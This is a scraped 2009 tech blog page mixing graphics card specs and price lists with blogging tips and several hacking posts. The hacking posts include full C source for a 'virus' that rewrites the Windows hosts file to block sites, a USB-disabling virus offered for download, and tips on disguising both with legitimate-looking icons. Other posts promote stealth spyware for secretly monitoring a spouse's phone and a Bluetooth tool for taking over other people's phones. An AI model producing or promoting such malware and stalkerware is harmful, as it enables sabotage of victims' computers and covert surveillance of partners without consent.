Translate!!

Subscribe in a reader

Saturday, September 26, 2009

Get a Call from your own Cell Phone number

Buzz It
submit to reddit StumbleUpon

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….
Just try the following steps and you’ll get a call to your cell phone from your own number.

1. Just give a missed call to this number.You’ll not be charged!

+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number
3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.
4. She say’s- Your PIN cannot be processed and the call disconnects..

ANOTHER TRICK

Instead of giving a missed call, just continue calling.The call will not be received and will get disconnected just after a while.But now do you know what happen’s?
You will get a call from the number

+501

Reason behind this trick

God Knows!!
Just try and pass your comments. Tell me whether the second trick worked or not!!

via

 

continue reading "Get a Call from your own Cell Phone number"

Cell Phone Spy – How to Spy on a Cell Phone

Buzz It
submit to reddit StumbleUpon

Cell Phone Spy – How to Spy on a Cell Phone


Cell Phone SpyAre you curious to know how to spy on a cell phone? Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.
Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you need to know the following facts.
1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone spy software.
2. Cell phone spy softwares are compatible with the following type of phones (operating systems).
1. Symbian OS (Most Nokia Phones)
2. Apple iphone
3. Windows Mobile
For a complete list of compatible cell phones visit the Mobile Spy site and click on Compatiblity link present on the left hand sidebar.
Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software to be the best one.

Mobile Spy  - The No.1 Cell Phone Spy Software

Mobile Spy is a perfect tool for parents to monitor their childern’s activity on thier cell phone!
Mobile Spy Features
Mobile Spy is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This unique system records the activities of anyone who uses the compatible cell phone ( iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone.
Logging Features
1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.
2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.
3. The phones’s current location is frequently logged using GPS when signal is available.
4. Each address entered into Internet Explorer (or any browser) is logged.
5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this software.
How it works
The working of Mobile Spy is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.
Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the software starts recording all the activities on the cell phone.
Step 3- Login to your online control panel to see the logs containing the recorded information.
This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details visit the following link

Mobile Spy


Why Mobile Spy?
Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab Mobile Spy and expose the truth.

Via

continue reading "Cell Phone Spy – How to Spy on a Cell Phone"

A Virus Program to Block Websites

Buzz It
submit to reddit StumbleUpon

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

 

continue reading "A Virus Program to Block Websites"

A Virus Program to Disable USB Ports

Buzz It
submit to reddit StumbleUpon

A Virus Program to Disable USB Ports



In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

Via

continue reading "A Virus Program to Disable USB Ports"

12 Tips to Maintain a Virus Free Computer

Buzz It
submit to reddit StumbleUpon
12 Tips to Maintain a Virus Free Computer
Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.
1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.
3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).
4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.
  • Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
  • You can also use a pop-up blocker to automatically block those pop-ups.
5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.
6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.
7. Install a good Antispyware program, that operates against Internet malware and spyware.
8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.
9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.
12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.
continue reading "12 Tips to Maintain a Virus Free Computer"

Hack Mobile Phones Through Bluetooth

Buzz It
submit to reddit StumbleUpon

Hack Mobile Phones Through Bluetooth

DO THIS AT YOUR OWN RISK

Update: There is a new version of this software here.
Yes guys it is the mobile bluetooth hacker. It is a software which can be used to hack any mobile phone through bluetooth network. Once connected to a another phone via bluetooth you can do the following:
1) Call from his phone. It includes all call functions like hold etc.
2) Read his messages
3) Read his contacts
4) Change profile

5) Play his ringtone even if phone is on silent
6) Play his songs(in his phone)
7) Restart the phone
8) Switch off the phone
9) Restore factory settings
10) Change ringing volume

Notes:
1.) When connecting devices use a code 0000
2.) At start of programming on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and downlaod it
download
enjoy and keep visiting us

 via

continue reading "Hack Mobile Phones Through Bluetooth"
Buzz It
submit to reddit StumbleUpon

Premium website templates


In the previous article i shared a few websites for blogger templates. Now it’s time to help you with telling you one of the best website for premium/paid templates. That’s Dream Template.
Dream Template have database of about 4, 000 templates and they are separated in a lot of categories. You will be able to find what you need just for seconds.
You should pay $59,95, but you will get access to an amazing database with thousands of templates and don’t forget that you can change these templates to work with blogger… so you will have excellent blogger templates for all of your blogs!

 

continue reading " "

Top 4 blogger template websites

Buzz It
submit to reddit StumbleUpon

Top 4 blogger template websites


In this article i will share with you the best places where you can find free blogger templates. As you know most of the websites which provides free blogger templates gives us ugly and non user friendly templates, but now, in this article you will find the Top 4 blogger template websites
1. Free blogger templates and premium WP templates – Go to the site

blogger-templates
Maybe this is one of the best websites for templates you can find. It provides really beautiful and functional blogger templates. Most of them are with so much extras and they look like WP templates.
eblog templates have database of about 350 beautiful templates
2.BTemplates – Go to the site

blogger-template
Btemplates is one of the leaders in blogger templates. It have a lot of template categories which will help you to find the template you need for your blogger. If you have your own blogger template you can submit it without any problems!
3. Blogger Templates -Go to the site
free-blogger-templates
That’s blogspot blog which is made specially for blogger templates. It provides a lot of blogger templates and probably you will find the best one which is for your needs.
4. Free XML Blogger TemplatesGo to the site
xml-blogger-templates
Dozens blogger templates for you and totally free.
I know that this is not the biggest collection of websites offering templates, but that’s are the best websites i know and i want to share them with you. I hope that they will help you to make one really unique and useful blogger blog!

 

continue reading "Top 4 blogger template websites"

How To Make Extra Money With Your Blogger Blog

Buzz It
submit to reddit StumbleUpon

How To Make Extra Money With Your Blogger Blog





Do you own blog ?
Do you want to make extra money with it?
No sense if it is just personal blog or business blog. No sense if it is blogger, wordpress or other blog!
You just have to decide how to monetize the traffic. You have a few ways for do that and maybe the best choice are affiliate programs and ppc programs.

In this article i will say a few sentences about a few affiliate and ppc programs which may help you to make extra money from your blog. I am using them, so they are legitimate and pays on time.
-CashBurners
That’s an affiliate program with high commissions. CashBurners gives commisions from 40 to 50% and an amazing starting bonus – $50 !
With CashBirners you can make extra money with your blog and in the same time you will offer products which have really good prices and you can give coupon codes to your customers.
You can sell: Sex Toys, Aphrodisiacs, Bodybuilding Supplements, Party Pills, Products for Women, Teeth whitening products and a lot of more!
http://blog.make-business.info/cashburners-50-bonus/
-AdSense
As you know Google AdSense is the most popular and reliable pay per click program. Everyone can use it and can earn extra money with his blog or website. But if you make something wrong… you can start using other ppc program like the sites posted above.
www.google.com/adsense
-AdBrite
Good one, but adsense is better.
adbrite.com
-Bidvertiser
This is maybe the second – after AdSense. Bidvertiser will pay you when u reach only $10 ! And you can get paid by PayPal which is one advantage.
bidvertiser.com
-CJ- Commission Junction
Also you can use and CJ. CJ is an affiliate program with thousands advertisers and they will offer you really big choice of products for promoting!
CJ.com
I am using CashBurners and CJ and i am really satisfied from them – i have received a lot of payments and that is my way to make extra money from my blogger blogs or my websites.
That’s How To Make Extra Money!











continue reading "How To Make Extra Money With Your Blogger Blog"

How to remove blogger navbar

Buzz It
submit to reddit StumbleUpon

How to remove blogger navbar

That’s the thing which everyone want to remove from his blog. Now it’s time to do it and i will help you.
But first of all i want to tell you what exactly is the blogger navbar. It gives a few options:
-to search in the blog
-to go to random chosen blog
-to mark the blog as spam
If you don’t want to have this navbar on your blog anymore just login in your blogger account, then to Layout, then to Edit HTML and after that you should put this code somewhere in before the end of HEAD tag:
#navbar-iframe {
display: none !important;
}

 

continue reading "How to remove blogger navbar"

11 of The Best Free Stock Photo Sites

Buzz It
submit to reddit StumbleUpon

11 of The Best Free Stock Photo Sites 




Stock Photo sites are the place where the bloggers and websites owners search for good pictures for their articles or for their template design.
There are a lot of paid stock photo sites, and a lot of free sites where you can find really/enough good stock photos. You know that most people are using free stock photo sites, but there are and a few who use paid sites. That means that if you want you can give some $ and you will have really unique pictures for your articles, but the free stock photos are not so bad, too.

StockVault – We love to share photos

Free Royalty Free Photos, Pictures, Images and Stock Photography

OpenPhoto.net
http://l.yimg.com/g/images/logo_home.png.v2
Flickr – Photo Sharing

Stock.XCHNG,the leading FREE stock photo site!

FREEIMAGES.CO.UK- Free Stock Photos

Image * After – currently 21579 free textures and images available

Free Large Photos

NOAA Photo Library
pdphoto
PD Photo – Free Photos And Pictures

Pictures free Download
There are a lot of more stock photo sites

 

continue reading "11 of The Best Free Stock Photo Sites"

Friday, September 25, 2009

MSI N9600GT Hybrid Freezer Graphics Card -Specs,Review,Price in India

Buzz It
submit to reddit StumbleUpon

MSI N9600GT Hybrid Freezer Graphics Card -Specs,Review,Price in India


MSI N9600GT Hybrid Freezer Graphics Card powered by Nvidia GeForce 9600GT provides total noise free experience with powerful graphics performance.It has the Revolutionary NVIDIA PureVideo HD engine technology.

The Eco-friendly MSI N9600GT Hybrid Freezer Graphics comes with the Hybrid Freezer cooling technology.The Hybrid Freezer technology helps the users to precisely monitor the temperature with GPU temperature auto-detecting and control the ventilation for a more silent operation, high computing performance and effective heat dissipation.
It has the PCI Express 2.0 support and The NVIDIA multi-GPU technology support.It’s Pre-O.C> vBIOS gives outstanding performance.It more specs are :
  • PCI Express 2.0 x16
  • Core clock     700MHz
  • Stream Processors     64
  • 1GB GDDR3 256-bit 1800MHz Memory
  • DirectX 10 OpenGL 2.1
  • 1 HDMI,2 DVI , HDTV / S-Video Out TV-Out Ports
  • 2560 x 1600 Maximum Resolution
  • RoHS Compliant
  • SLI Support
  • Cooler     With Fan
  • 6 Pin Power Connector
  • Dual-Link DVI Support
  • HDCP Ready
  • Hybrid Freezer automatic fan speed adjustment
continue reading "MSI N9600GT Hybrid Freezer Graphics Card -Specs,Review,Price in India"

SPARKLE GeForce 9800 GTX+ Graphics Card

Buzz It
submit to reddit StumbleUpon

SPARKLE GeForce 9800 GTX+ Graphics Card

SPARKLE GeForce 9800 GTX+ Graphics Card – Based on new Nvidia 9800 GTX+ 55 nm process for extreme Gaming


sparkle 9800gtx+ graphics card
 SPARKLE GeForce 9800 GTX+ Graphics Card Specs:
  • Model SF-PX98GTX+512D3-HP and SF-PX98GTX+512D3-HM
  • Graphics Processing Unit – GeForce 9800 GTX+
  • Core Clock – 738MHz
  • Memory Clock – 2200MHz
  • Memory Type – 512MB GDDR3
  • Memory Interface – 256-bit
  • Stream Processors – 128
  • Stream Processors Clock – 1836MHz
  • Bus Type – PCI-Express 2.0
  • RAMDAC – 400 MHz
  • Outputs – Dual DVI-I+HDTV
  • HDTV – Resolution up to 1920 X 1080i
  • HDCP – Yes
  • HDMI – Yes(Via adapter-HM series)
SPARKLE GeForce 9800 GTX+ Price in India – 9000+ Indian Rupee
continue reading "SPARKLE GeForce 9800 GTX+ Graphics Card"

XFX 88000GT Alpha Dog Edition – Good performance Affordable price

Buzz It
submit to reddit StumbleUpon

XFX 88000GT Alpha Dog Edition – Good performance Affordable price

XFX 88000GT Alpha Dog Edition – One of the best graphics card available in Indian market
xfx 8800gt alpha dog edition


  • 8800 Series single slot solution



  • PCI Express® 2.0 support



  • 112 Stream Processors



  • NVIDIA® Unified architecture with GigaThread™ technology



  • Full Microsoft® DirectX® 10 Shader Model 4.0 support.



  • NVIDIA SLI™-Ready



  • 16x full-screen anti-aliasing



  • True 128-bit floating point high dynamic-range(HDR) lighting



  • NVIDIA Quantum Effects™ physics processing technology



  • Two dual-link DVI outputs support two 2560×1600 resolution displays



  • NVIDIA PureVideo™technology®



  • OpenGL® 2.0 support



  • Nvidia ForceWare® Unified Driver Architecture (UDA)



  • Built for Microsoft® Windows Vista™



  • Also available in Factory OverClocked XT and XXX versionsXFX 88000GT Alpha Dog Edition Price – 9200/- Indian Rupee



  • continue reading "XFX 88000GT Alpha Dog Edition – Good performance Affordable price"

    Nvidia GeForce GTX 280 Review – Fastest Graphics card in Planet

    Buzz It
    submit to reddit StumbleUpon

    Nvidia GeForce GTX 280 Review – Fastest Graphics card in Planet

    NVIDIA launched a new architecture graphics cards Nvidia Geforce GTX 280/260.
    The Nvidia Geforce GTX 280 is built on a 65nm process and has 1.4 billion transistors.
    Nvidia GeForce GTX 280


     Nvidia Geforce GTX 280 Pros
    1. Fastest Graphics Card
    2. Overall performance in comparison to 8800GTX
    3. Energy Efficient Very low power consumption at idle state
    4. Accelerated CUDA (Compute Unified Device Architecture) software
    Nvidia Geforce GTX 280 Cons
    1. Still No support for DirectX 10.1
    2. Little Performance enhancement compared to the 9800 GX2
    3. Noise
    4. High Price not worthy 9800 GX2 still better option
    The Nvidia Geforce GTX 280 Price in India – Not available
    Nvidia Geforce GTX 280 Specification
    GPU Core Engine Specification:
    • Processor Cores 240
    • Graphics Clock (MHz) 602 MHz
    • Processor Clock (MHz) 1296 MHz
    • Texture Fill Rate (billion/sec) 48.2
    Memory Specs:
    • Memory Clock (MHz) 1107 MHz
    • Standard Memory Config 1GB GDDR3
    • Memory Interface Width 512-bit
    • Memory Bandwidth (GB/sec) 141.7
    Feature Support:
    • NVIDIA SLI®-ready1 2-/3-way
    • NVIDIA PureVideo® Technology2 HD
    • NVIDIA PhysX™-ready3
    • NVIDIA CUDA™ Technology
    • HybridPower™ Technology4
    • GeForce Boost Microsoft DirectX 10 OpenGL 2.1
    • Bus Support PCI-E 2.0 x16
    • Certified for Windows Vista
    Display Support:
    • Maximum Digital Resolution 2560 X 1600 Maximum
    • VGA Resolution 2048 X 1536
    • Standard Display Connectors 2 dual-link DVI and 1 analog HDTV-out
    • Multi Monitor (# of displays) 2
    • HDCP5
    • HDMI6 Via Adapter
    • Audio Input for HDMI SPDIF
    Graphics Card Size: Height 4.376 inches (111 mm) Length 10.5 inches (267 mm) Width Dual-slot Thermal and Power Specs: Maximum GPU Temperature 105C Maximum Graphics Card Power 236W Minimum System Power Requirement 550W Supplementary Power Connectors One 8-pin + one 6-pin
    For detailed Nvidia Geforce GTX 280 review visit these sites
    Anandtech
    Toms Hardware
    continue reading "Nvidia GeForce GTX 280 Review – Fastest Graphics card in Planet"

    Gigabyte GV-N26-896H-B Graphics card based on Nvidia GTX260

    Buzz It
    submit to reddit StumbleUpon

    Gigabyte GV-N26-896H-B Graphics card based on Nvidia GTX260

    New Graphics card from Gigabyte GV-N26-896H-B based on latest Nvidia GTX 260 graphics core for best performance at less

















     
     Gigabyte GV-N26-896H-B Main Features
    • Powered by NVIDIA GTX 260 Graphics core
    • Supports PCI Express 2.0
    • Microsoft DirectX 10 and OpenGL 2.1 support
    • Integrated with the industry’s best 896MB GDDR3 memory and 448-bit memory interface
    • Supports PhysX™ and Cuda™ Technology from Nvidia
    • Features dual DVI-I / D-sub(by adapter) /HDTV
    Gigabyte GV-N28-1GH-B Graphics card Price in India – 29400/- indian rupee
    Gigabyte Gigabyte GV-N26-896H-B very high priced you can buy 2 latest ATI 4850 Graphics card (use in crossfire mode) which give you higher performance at same or little higher cost.
    But ATI 4850 graphics card not launched in India. 



    continue reading "Gigabyte GV-N26-896H-B Graphics card based on Nvidia GTX260"

    Zebronics Graphics Card Price List India – Nvidia Video Cards

    Buzz It
    submit to reddit StumbleUpon

    Zebronics Graphics Card Price List India – Nvidia Video Cards

    PRICE LIST

    Zebronics Graphics Card Price List India – Nvidia Video Cards
    Zebronics nVidia 8500GT 256 MB     —Rs.2990
    Zebronics nVidia 8500GT 512 MB     —Rs.2595
    Zebronics nVidia 8600GT 256 MB     —Rs.3800
    Zebronics nVidia 8600GT 512 MB     —Rs.4100

    Zebronics nVidia 7300GT 512 MB     —Rs.2200
    Zebronics nVidia 6600 256 MB     —Rs.3600
    Zebronics nVidia 8600GTS 512 MB —Rs.11500
    Zebronics nVidia 7300LE 256 MB     —Rs.1720
    Zebronics nVidia 7200GS 256MB     —Rs.1090
    Zebronics nVidia 7100GS 256MB     —Rs.1290
    Zebronics nVidia 7300GT 512MB AGP —Rs.3100
    Zebronics nVidia 6200 256MB AGP —Rs.1610
    Zebronics nVidia 6200 128MB AGP —Rs.1280
    Zebronics nVidia FX5200 256MB AGP —Rs.1190
    Zebronics nVidia FX5200 128MB PCI VGA —Rs.1740
    Zebronics nVidia FX5200 256MB PCI VGA —Rs.2290
    continue reading "Zebronics Graphics Card Price List India – Nvidia Video Cards"

    NVIDIA GeForce Graphics cards Price List India

    Buzz It
    submit to reddit StumbleUpon

    NVIDIA GeForce Graphics cards Price List India



    BEGINER GAMING TO HIGH-END GAMING
    XFX GRAPHICS CARDS
    XFX 7200GS 256MB –Rs.1,250
    XFX 7100GS 512MB –Rs.1,450
    XFX 7300LE 256MB –Rs.1,800
    XFX 7300GS 256MB –Rs.1,500
    XFX 7300GT 256MB –Rs.2,000
    XFX 7300GT 512MB –Rs.2,300
    XFX 7600GS 256MB –Rs.3,100
    XFX 7600GS 512MB –Rs.4,000
    XFX 7600GT 256MB –Rs.4,500
    XFX 8400GS 256MB DDR2 –Rs.1650
    XFX 8400GS 512MB DDR2 –Rs.1850
    XFX 8500GT 256MB DDR2 –Rs.2450
    XFX 8500GT 512MB DDR2 –Rs.2800
    XFX 8600GT 512MB DDR2 –Rs.3450
    XFX 8600GT 256MB DDR3 –Rs.3750
    XFX 8600GT 256MB DDR3 –Rs.3050
    XFX GeForce 9600 GSO DDR2 768MB – Rs.4200
    XFX 9600GT 512MB DDR3 –Rs.7950
    XFX 9800GT 512MB DDR3 –Rs.10600
    XFX GTX 295 896MB DDR3 GX295NHHFF – Rs.32500
    XFX GeForce GTX 260 (GX-260N-ADFF) – Rs.10600
    XFX GTS 250 1GB DDR3 (GS250XZDFC) – Rs.9150
    xfx-nvidia

    XFX PV-T88P-YDF4 GeForce 8800 GT, 512 MB DDR3 –Rs.13,500
    XFX PV-T88P-YDE4 GeForce 8800 GT, 512 MB DDR3 Extreme –Rs.13,900
    XFX PV-T88P-YDD4 GeForce 8800 GT, 512 MB DDR3 XXX –Rs.15,200
    XFX 8800GTX 768MB –Rs.31,500

    POV GRAPHICS CARDS
    POV 7200GS 128MB DDR2 –Rs.1250
    POV 7200GS 256MB DDR2 –Rs.1350
    POV 7300GT 256MB DDR2 –Rs.2325
    POV 7300GT 512 MB DDR2 –Rs.2450
    POV 7600GS 256MB DDR2 –Rs.3300
    POV 7600GS 512MB DDR2 –Rs.4575
    POV 7600GT 256MB DDR3 –Rs.5450
    POV 8400GS 256MB DDR2 –Rs.1700
    POV 8400GS 512MB DDR2 –Rs.1900
    POV 8500GT 256MB DDR2 –Rs.2300
    POV 8500GT 512MB DDR2 –Rs.2450
    POV 8500GT 1GB DDR2 –Rs.3450
    POV 8600GT 512MB DDR2 –Rs.3200
    POV 8600GT 1GB DDR2 –Rs.4200
    POV 8800GT 512MB GDDR3 –Rs.8,900
    POV 9400GT 512MB DDR2 –Rs.3250
    POV 9400GT 1GB DDR2 –Rs.4050
    POV 9500GT 512MB DDR2 –Rs.4000
    POV 9500GT 1GB DDR2 –Rs.4800
    POV 9600GT 512MB DDR3 –Rs.7100
    POV 8800GT 512MB DDR3 –Rs.10100
    POV GTX 260 896MB DDR3 –Rs.18700
    POV GTX 280 1GB DDR3 –Rs.28900

    PALIT GRAPHICS CARDS
    Palit Geforce FX5500 256MB DDR –Rs.1900
    Palit Geforce 7100GS 256MB DDR2 –Rs.1250
    Palit Geforce 7200GS 256MB DDR2 –Rs.1300
    Palit Geforce 7300GT 512MB DDR2 –Rs.2150
    Palit Geforce 8600GT Super 512MB DDR3 –Rs.4235.00
    Palit Geforce 9500GT Super+1GB DDR2 –Rs.3430.00
    Palit Geforce 9800GT Super+1GB DDR3 –Rs.8010.00
    Palit GeForce 9600GT 512MB DDR3 –Rs.5720.00
    Palit GeForce 8400GS (HDMI) 512MB DDR2 Graphic Card –Rs.1660.00
    Palit GeForce 9400GT Super 1GB DDR2 Graphic Card –Rs.2745.00
    Palit GeForce 9400GT Super 512MB DDR2 Graphic Card –Rs.2460.00
    Palit GeForce 9500GT Super 1GB DDR2 Graphic Card –Rs.3430.00
    Palit GeForce 9500GT Super 512MB DDR2 Graphic Card –Rs.3320.00
    Palit GeForce 9600GT 1GB DDR3 –Rs.7720.00
    Palit GeForce 9800GTX+ 512MB DDR3 Graphic Card –Rs.10980.00
    Palit GeForce GF9800GT 512MB –Rs.7095.00
    Palit GeForce GTX 275 Sonic GTX275 Sonic SP216 896MB 448Bit DDR3 w/ 2 X DVI, HDMI –Rs.17300
    Palit GeForce GTX 295 1792MB DDR3 PCI With HDMI –Rs.31600

    EVGA GRAPHICS CARDS
    EVGA 9600GT Knock Out (KO) 512MB DDR3 –Rs.6350
    EVGA 9800GT SC(Super Clocked) 512MB DDR3 –Rs.8750
    EVGA 9800 GTX+ SC 512MB DDR3 –Rs.10900
    EVGA GTX 260 SC 896MB DDR3 –Rs.15250
    EVGA GTX 280 SSC(Super Super Clocked) 1GB DDR3 –Rs.22750
    EVGA GTX 295 SSC(Super Super Clocked) 1792MB DDR3 –Rs.32500

    msi-nvidiaMORE
     MSI-Graphics cards

    MSI 8400GS NX 8400GS -TD 512EH 512MB GDDR2 Graphics Card –Rs.1,889
    MSI 9500GT N9500GT-MD1G-OC/D2 1GB GDDR2 Graphics Card –Rs.3,852
    MSI 9600GT N9600GT Green-MD512 512MB GDDR3 Graphics Card –Rs.5,936
    MSI N9600GT N9600GT-T2D1G 1GB GDDR3 Graphics Card–Rs.6,385
    MSI 9800GT N9800GT-T2D512-OC(Fan) 512MB GDDR3 Graphics Card–Rs.7,056
    MSI 9800GT N9800GT-T2D1G-OC(Lite) 1GB GDDR3 Graphics Card–Rs.8,401
    MSI 9800GTX N9800GTX-Plus -T2D512 512MB GDDR3 Graphics Card–Rs.9,184
    MSI GTS250 N250GTS-2D512-OC-Cyclone 512MB GDDR3 Graphics Card–Rs.9,521
    MSI GTX 260 216SP N260GTX-T2D896-OC 896MB GDDR3 Sonic Edition Graphics Card–Rs.14,560
    MSI GTX 275 N275GTX Twin Frozr OC 896MB GDDR3 Graphics Card–Rs.17,921
    MSI GTX260 N260GTX Lightning Black Edition 1792MB GDDR3 Graphics Card –Rs.19,041
    MSI GTX 295 N295GTX-M2D1792 1792MB GDDR3 Graphics Card –Rs.32,482


    continue reading "NVIDIA GeForce Graphics cards Price List India"

    How Do I Install Net Meeting

    Buzz It
    submit to reddit StumbleUpon
    How Do I Install Net Meeting

    Wondering how to install Netmeeting on Windows XP? Well you don't have to install it! Why? It is already pre-installed with Windows XP, but (by design they say) it isn't linked to anywhere on your programs menu. Here is how to load it:

    1: Click START then RUN
    2: Enter "conf" without the quotes

    That's it - now you can Netmeet to your hearts content.
    continue reading "How Do I Install Net Meeting"

    Compatibility Mode Make older programs run in Windows XP

    Buzz It
    submit to reddit StumbleUpon
    Compatibility Mode Make older programs run in Windows XP
